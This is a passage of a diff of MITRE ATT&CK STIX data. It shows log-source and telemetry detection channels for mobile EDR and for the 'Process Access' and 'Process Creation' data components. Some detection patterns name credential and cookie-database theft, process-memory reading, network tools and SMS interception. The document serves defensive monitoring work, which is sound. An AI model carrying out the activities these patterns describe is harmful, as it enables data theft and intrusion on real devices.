+                            "channel": "Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility framework usage patterns such as event subscription, performAction invocation, node traversal, text change observation, or overlay/window presentation correlated to app identity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Browser/WebView framework usage indicating external URL load, script execution enablement, file download initiation, intent handoff, or package install prompt sequence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Observed device-service, trust-service, backup/service interaction, or other privileged framework activity associated with physical host access"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Connectivity manager, telephony, Wi-Fi, network callback, or location-provider framework reports repeated unavailable, disconnected, suspended, or degraded state transitions"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Observed network-path, reachability, DNS, transport, or location-provider framework reports repeated unavailable or failed state near active device use"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Content resolver, document provider, media store, storage access framework, bulk stream processing, or repeated crypto-adjacent framework use observed during multi-file transformation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Known application begins first-seen or expanded use of content providers, account services, accessibility, package services, cryptographic routines, dynamic loading, or other framework interactions after update/install"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Known application begins first-seen or expanded use of protected frameworks, account services, background task APIs, crypto/network service APIs, or other runtime behaviors after update/install"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Privileged or OEM-context framework/API use tied to telephony, device policy, accessibility, overlay, input injection, package visibility, or protected settings modification from an identity not expected for the device model or approved image"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of Calendar.set() and Calendar.add()"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Supplemental anomaly in baseband, IOKit, accessory, security, or activation-related subsystem logging temporally adjacent to suspicious posture or network behavior"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Recently installed or updated trusted app invokes Android framework paths or special access patterns inconsistent with its role, including accessibility-like behavior, overlay behavior, package visibility expansion, protected settings access, device policy interaction, or unusual IPC/provider access"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Supplemental managed app or system subsystem anomalies near install/update, launch services, extension handling, app activation, or background execution temporally adjacent to suspicious network or lifecycle behavior"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App uses Android framework behaviors associated with background work scheduling, network job execution, IPC/provider access, overlay or accessibility-like interaction, or unusual package visibility immediately adjacent to web-service communication"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Supplemental launch, background task, networking, or extension-handling anomalies occur temporally adjacent to suspicious web-service communication from a managed app or supervised device"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background work scheduler, job execution, or persistent service triggered network request to public web-service followed by second outbound connection within TimeWindow"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Background task or networking subsystem event occurred immediately before resolver retrieval and pivot connection sequence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded retrieve-then-write exchange with public web-service platform"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Background task, networking, or app-activation subsystem event occurred immediately before or during retrieve-then-write exchange with public web-service platform"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of CallLogs.getLastOutgoingCall()"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of ContactsContract.Contacts.getLookupUri() and/or ContactsContract.Contacts.lookupContact()"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Camera, media capture, app-activation, or background-task subsystem event occurred immediately before or during sustained camera session from same managed-app or device context"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of AccountManager.getAccounts()"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "MediaProjection-style screen capture session began from app identity while a different app was foregrounded and capture path was not mapped to approved recording workflow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-service activity from app identity coincided with foreground content observation and subsequent screenshot, frame buffer, or screenrecord artifact behavior within TimeWindow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Privileged screencap, screenrecord, adb-driven capture, or root-context screen acquisition behavior occurred from app, shell, or elevated identity while foreground app context changed or sensitive app remained active"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-enabled app invoked programmatic click or action on behalf of user while a different app was foregrounded and injected action was not mapped to approved accessibility or autofill workflow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-enabled app invoked global action such as back, home, recents, or navigation control while target foreground app context changed within TimeWindow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-enabled app inserted text into active field of different foreground app without user keyboard activity or approved autofill relationship"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App intercepts notification content from external package (e.g., messaging/auth apps) while in background OR without recent user interaction"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App invokes cryptographic functions (e.g., AES/RSA/KeyStore usage) on buffer data followed by encode/transform operations not tied to normal app workflows"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App invokes symmetric encryption routines (e.g., AES/RC4 cipher initialization + encrypt operations) with repeated key usage across multiple data buffers"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Symmetric key material reused across multiple encryption operations within short interval OR derived locally without secure hardware-backed storage"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App invokes asymmetric cryptographic operations (e.g., RSA/ECC keypair generation OR public key encryption OR signature operations) on outbound data buffers"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Keypair generation, import, or access events (public/private key usage) occurring prior to network communication"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes custom TLS trust evaluation logic or pin validation routines (e.g., custom TrustManager, HostnameVerifier override, certificate/public key comparison) immediately before outbound TLS session establishment"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes archive, compression, or bulk-buffer packaging routines on previously accessed local data within the same execution chain"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application encrypts newly created archive or staged data blob after collection and before storage or outbound transfer"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs bulk data transformation or packaging-like processing on collected records prior to file creation or upload"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application queries or opens multiple local SQLite or app-associated database stores containing records unrelated to the app's declared function during the collection phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs repeated record access, container traversal, or local data extraction processing against local stores before staging or transmission"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application calls startForegroundService() or startForeground() / ServiceCompat.startForeground() and transitions to persistent foreground-service execution at the start of the chain"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes direct file retrieval, DownloadManager usage, or streaming write from network response to local storage immediately after remote session establishment"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app performs post-download unpacking, dynamic resource handling, or module preparation immediately after local payload creation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application loads or resolves native shared library (.so) or JNI bridge immediately before suspicious native execution phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application transitions from managed code into JNI/native function execution or attaches native thread to runtime during the execution phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Existing application is replaced, updated, or reinstalled and the resulting package metadata, code sections, or executable-supporting artifacts diverge from known-good baseline during the persistence-establishment phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes SMS send, intercept, delete, or provider-write behavior, including handling SMS_DELIVER or interacting with SMS content provider during unauthorized message-control phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application enqueues WorkManager work request or schedules JobScheduler or AlarmManager task with delay, periodic interval, or execution constraints during the persistence/execution setup phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application creates or executes NSBackgroundActivityScheduler activity with repeating or deferred invocation semantics during the scheduling and trigger phases"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application initializes proxy-capable or raw-socket networking constructs, including SOCKS-capable Proxy API usage or direct socket listener/setup immediately before traffic relay phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes call placement, answer, redirect, block, screening, or ConnectionService call-handling APIs during unauthorized call-control phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application process loads external code modules or injects into runtime (zygote/app_process) + abnormal library loading or method interception behavior"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application registers broadcast receiver, WorkManager job, JobScheduler task, or intent filter tied to system event such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE during persistence setup phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application registers or invokes broadcast receiver via registerReceiver() or manifest-declared receiver + intent filter tied to system or app events"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application launches or executes code where loaded library or component path does not match application package path or expected signing context"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "multiple applications invoking core system APIs (e.g., sensor, permission, telephony) with abnormal or inconsistent return values across apps within short interval"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "device integrity degradation + root detected or system partition modification affecting runtime libraries (e.g., /system/lib*, /vendor/lib*)"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes privileged framework APIs (Accessibility events, UI automation, package install flows) immediately following permission grant"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes DevicePolicyManager APIs (e.g., resetPassword, lockNow, setCameraDisabled) immediately following admin activation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application queries target-selection attributes (e.g., location, SIM/operator, locale, device state, network identity) and then conditionally invokes sensitive framework APIs only after expected value is observed"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application exhibits repeated environment-context evaluation followed by delayed privileged framework use only after target-specific match"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes geolocation or geofencing framework operations (e.g., location polling or geofence registration/evaluation) and sensitive framework activity begins only after region match or location threshold condition"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application exhibits repeated location-context evaluation followed by delayed privileged framework use or feature activation only after target region match"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes package or component state changes affecting launcher-facing activity availability and subsequently continues operational framework activity after icon suppression"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes motion-sensor or device-activity framework operations followed by conditional execution of sensitive framework activity only after inferred user absence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes system framework operations that alter monitoring, accessibility, or execution visibility followed by reduction in expected telemetry generation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes accessibility global actions (back/home/recents) or observes package-management UI immediately after uninstall/settings screen becomes foreground"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes lock-related or UI-denial framework operations, including DevicePolicyManager lock actions, persistent overlay behavior, or accessibility-driven navigation interference immediately before device enters locked or unusable state"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes uninstall-related package-management operations, accessibility-driven uninstall confirmation actions, or privileged file-removal operations immediately before installed-state loss"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes file-management, package, storage, or administrative wipe operations immediately before loss of expected local files or file collections"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.775000+00:00\", \"old_value\": \"2026-04-23 18:22:40.476000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.770000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0035",
+                            "external_id": "DC0035"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Process Access",
+                    "description": "Refers to an event where one process attempts to open another process, typically to inspect or manipulate its memory, access handles, or modify execution flow. Monitoring these access attempts can provide valuable insight into both benign and malicious behaviors, such as debugging, inter-process communication (IPC), or process injection.\n\n*Data Collection Measures:*\n\n- Endpoint Detection and Response (EDR) Tools:\n    -  EDR solutions that provide telemetry on inter-process access and memory manipulation.\n- Sysmon (Windows):\n    - Event ID 10: Captures process access attempts, including:\n        - Source process (initiator)\n        - Target process (victim)\n        - Access rights requested\n        - Process ID correlation\n- Windows Event Logs:\n    - Event ID 4656 (Audit Handle to an Object): Logs access attempts to system objects.\n    - Event ID 4690 (Attempted Process Modification): Can help identify unauthorized process changes.\n- Linux/macOS Monitoring:\n    - AuditD: Monitors process access through syscall tracing (e.g., `ptrace`, `open`, `read`, `write`).\n    - eBPF/XDP: Used for low-level monitoring of kernel process access.\n    - OSQuery: Query process access behavior via structured SQL-like logging.\n- Procmon (Process Monitor) and Debugging Tools:\n    - Windows Procmon: Captures real-time process interactions.\n    - Linux strace / ptrace: Useful for tracking process behavior at the system call level.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=10"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Process State"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace attach"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "ptrace or task_for_pid"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_open"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "High frequency of accept(), read(), or SSL_read() syscalls tied to nginx/apache processes"
+                        },
+                        {
+                            "name": "Apple TCC Logs",
+                            "channel": "Microphone Access Events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "syscalls (open, read, ioctl) on /dev/input or /proc/*/fd/*"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=25"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_OPEN"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected NSXPCConnection calls by non-Apple-signed or abnormal binaries"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unusual Mach port registration or access attempts between unrelated processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.security, library=libsystem_kernel.dylib"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace syscall or access to /proc/*/mem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "vm_read, task_for_pid, or file open to cookie databases"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process_events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ACCESS"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, fork, mmap, ptrace"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace or process_vm_readv"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "unexpected memory inspection"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Code signing validation events referencing newly written local Mach-O/bundle prior to exec or dlopen"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Runtime grant or manifest presence for MANAGE_EXTERNAL_STORAGE/READ_EXTERNAL_STORAGE/READ_MEDIA_*; legacy external storage mode detection"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Privacy (TCC) prompts/grants for Photos/Files or access changes indicating new visibility into user/app data"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Activity/Process state change (mFocusedApp, onResume/onPause) identifying <pkg> as foreground"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Foreground/background transition for <bundle_id> to contextualize access timing"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Grant/activation of BIND_ACCESSIBILITY_SERVICE, BIND_INPUT_METHOD, SYSTEM_ALERT_WINDOW, POST_NOTIFICATIONS for <pkg>"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Keyboard extension Full Access change; privacy grant touching input/keyboard categories for <bundle_id>"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Grant/enablement for BIND_ACCESSIBILITY_SERVICE or BIND_INPUT_METHOD for <pkg>"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Keyboard extension Full Access change or related privacy grant for <bundle_id>"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Grant/enablement of SYSTEM_ALERT_WINDOW, BIND_ACCESSIBILITY_SERVICE, POST_NOTIFICATIONS for <pkg>"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Scene/foreground transitions for <bundle_id> to contextualize timing"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Reads/queries ops for PACKAGE_USAGE_STATS, QUERY_ALL_PACKAGES, BIND_DEVICE_ADMIN, BIND_VPN_SERVICE"
+                        },
+                        {
+                            "name": "EDR:telemetry",
+                            "channel": "Sustained or high-frequency location sensor access, including background location usage"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.770000+00:00\", \"old_value\": \"2026-02-23 18:45:08.713000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0035\", \"old_value\": \"https://attack.mitre.org/data-components/DC0035\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.773000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0032",
+                            "external_id": "DC0032"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Process Creation",
+                    "description": "Refers to the event in which a new process (executable) is initialized by an operating system. This can involve parent-child process relationships, process arguments, and environmental variables. Monitoring process creation is crucial for detecting malicious behaviors, such as execution of unauthorized binaries, scripting abuse, or privilege escalation attempts.. ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Process",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream 'eventMessage contains pubsub or broker'"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=1"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Execution of binary resolved from $PATH not located in /usr/bin or /bin"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process execution path inconsistent with baseline PATH directories"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4688"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process_events"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of launchctl with suspicious arguments"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve network tools"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls to soffice.bin with suspicious macro execution flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process execution of Microsoft Word, Excel, PowerPoint with macro execution attempts"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process reading browser configuration paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec logs"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve: Processes launched with LD_PRELOAD/LD_LIBRARY_PATH pointing to non-system dirs"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec: Process execution context for loaders calling dlopen/dlsym"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "EXECVE"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execution of unexpected binaries during user shell startup"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launch of Terminal.app or shell with non-standard environment setup"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC with unusual parent-child process relationships from zsh"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of systemctl or service stop"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of launchctl or pkill"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process::exec"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of klist, kinit, or tools interacting with ccache outside normal user context"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Execution of non-standard binaries accessing Kerberos APIs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Electron-based binary spawning shell or script interpreter"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Electron app spawning unexpected child process"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/root/.ash_history or /etc/init.d/*"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls with high-frequency or known bandwidth-intensive tools"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec or spawn calls to proxy tools or torrent clients"
+                        },
+                        {
+                            "name": "containers:osquery",
+                            "channel": "bandwidth-intensive command execution from within a container namespace"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process launch"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --info --predicate 'subsystem == \"com.apple.cfprefsd\"'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of security, sqlite3, or unauthorized binaries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected applications generating outbound DNS queries"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "EventCode=1"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "execve"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected child process of Safari or Chrome"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve or syscall invoking vm artifact check commands (e.g., dmidecode, lspci, dmesg)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of system_profiler, ioreg, kextstat with argument patterns related to VM/sandbox checks"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process writes or modifies files in excluded paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "com.apple.mail.* exec.*"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of memory inspection tools (lldb, gdb, osqueryi)"
+                        },
+                        {
+                            "name": "esxi:vobd",
+                            "channel": "/var/log/vobd.log"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "kubectl exec or kubelet API calls targeting running pods"
+                        },
+                        {
+                            "name": "docker:audit",
+                            "channel": "Process execution events within container namespace context"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "process persists beyond parent shell termination"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "background process persists beyond user logout"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of scripts or binaries sourced from mail directories (/var/mail, ~/Maildir)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Preview.app, Safari.app, or Mail.app spawning new processes outside normal patterns"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "process execution across cloud VM"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "systemctl spawning managed processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/shell.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of processes linked to hijacked sessions (e.g., anomalous parent-child process lineage)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec events where web process starts a shell/tooling"
+                        },
+                        {
+                            "name": "docker:events",
+                            "channel": "Docker/Kubernetes audit of exec/attach (kubectl exec) or unexpected child processes inside container"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec of osascript, bash, curl with suspicious parameters"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of container management CLIs (docker, crictl, kubectl) or interpreted shells (sh, bash, python) within container context"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_exec"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of discovery commands targeting backup binaries, processes, or config paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process execution logs showing discovery commands like mdfind, system_profiler, or launchctl list"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events OR launchd"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd or process_events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process and file events via log stream"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of scripts or binaries spawned from browser processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Browser processes launching unexpected interpreters (osascript, bash)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Execution of defaults, plutil, or common editors (vim/nano) targeting plist files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "EXECVE"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:exec"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of bash, python, or perl processes spawned by browser/email client"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
